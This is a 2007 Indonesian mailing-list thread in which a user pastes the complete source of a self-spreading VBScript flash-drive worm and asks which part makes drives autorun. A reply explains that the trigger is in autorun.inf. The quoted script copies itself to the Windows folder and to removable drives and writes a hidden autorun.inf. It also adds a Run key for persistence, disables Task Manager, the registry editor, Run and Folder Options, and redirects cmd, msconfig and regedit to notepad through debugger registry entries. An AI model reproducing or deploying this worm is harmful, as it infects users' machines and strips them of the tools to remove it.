Re: [PCplus] Flashdisk autorun karena skrip vbs?

Rakhmad Azhari Wed, 07 Mar 2007 03:19:33 -0800

Wah, virus VBS ini lagi :D. Kayaknya sih bagian yang bikin dia autorun itu
gak ada disini,
biasanya ada di file laen, namanya autorun.inf Coba aja diliat, pasti ada
perintah buat
ngejalanin file VBS ini.



On 3/7/07, darkness night <[EMAIL PROTECTED]> wrote:
>
>   Kemarin saya dapet file vbs dari flash disk temen yang pc-nya terinfeksi
> sesuatu. jadi tu pc ngopi file vbs kemana2, yang isinya hampir sama, salah
> satu variannya:
> =================================================
> 'My name is Slow but sure V1.08
> on error resume next
> dim rekursif,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
> atr = "[autorun]" & vbcrlf & "shellexecute=wscript.exe r4n694-24y.dll.vbs"
> set fs = createobject("Scripting.FileSystemObject")
> set mf = fs.getfile(Wscript.ScriptFullname)
> dim text,size
> size = mf.size
> check = mf.drive.drivetype
> set text = mf.openastextstream(1,-2)
> do while not text.atendofstream
> rekursif = rekursif & text.readline
> rekursif = rekursif & vbcrlf
> loop
> do
> Set winpath = fs.getspecialfolder(0)
> set tf = fs.getfile(winpath & "\r4n694-24y.dll.vbs")
> tf.attributes = 32
> set tf=fs.createtextfile(winpath & "\r4n694-24y.dll.vbs",2,true)
> tf.write rekursif
> tf.close
> set tf = fs.getfile(winpath & "\r4n694-24y.dll.vbs")
> tf.attributes = 39
> for each flashdrive in fs.drives
> If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and
> flashdrive.path <> "A:" then
> set tf=fs.getfile(flashdrive.path &"\r4n694-24y.dll.vbs")
> tf.attributes =32
> set tf=fs.createtextfile(flashdrive.path &"\r4n694-24y.dll.vbs",2,true)
> tf.write rekursif
> tf.close
> set tf=fs.getfile(flashdrive.path &"\r4n694-24y.dll.vbs")
> tf.attributes = 39
> set tf =fs.getfile(flashdrive.path &"\autorun.inf")
> tf.attributes = 32
> set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
> tf.write atr
> tf.close
> set tf = fs.getfile(flashdrive.path &"\autorun.inf")
> tf.attributes=39
> end if
> next
> set rg = createobject("WScript.Shell")
> rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> Explorer\Main\Window Title","Hacked by Zay"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",
> "0", "REG_DWORD"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",
> "1", "REG_DWORD"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",
> "1", "REG_DWORD"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",
> "1", "REG_DWORD"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
> "1", "REG_DWORD"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",
> "1", "REG_DWORD"
> rg.regwrite
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\r4n694-24y",
> winpath & "\r4n694-24y.dll.vbs"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution
> Options\RegistryEditor.exe\Debugger","notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\RegisteredOrganization", "Don't Panic, System anda sudah
> kami ambil alih !"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\RegisteredOwner","r4n694-24y"
> if check <> 1 then
> Wscript.sleep 200000
> end if
> loop while check <> 1
> set sd = createobject("Wscript.shell")
> sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
> ==========================================================================
> varian yang lain yang saya dapet, sayang sekali karena terbiasa, langsung
> saya shift+del...
> tapi saya sempet coba jalanin juga, dan pada intinya dia bikin flashdisk
> jadi bisa autorun!!!!!!!
> keren sih, jadi bisa berkreasi.....hehehehehe....
> pokonya, varian satunya itu, yang bikin IE ada keterangan Hacked by
> Godzilla
> atau siapaaaa geto, pokoknya ada zilla-zillanya deh.....
>
> nah, kan keren tu, jadi saya pingin tanya nih, bagian mana dari skrip yang
> bisa bikin flashdisk autorun? Jadi dari my computer, jika kita klik kanan
> drive flashdisknya ada pilihan autorun, keren deh......
>
> makasih
>
> [Non-text portions of this message have been removed]
>
>  
>


[Non-text portions of this message have been removed]

Re: [PCplus] Flashdisk autorun karena skrip vbs?

Kirim email ke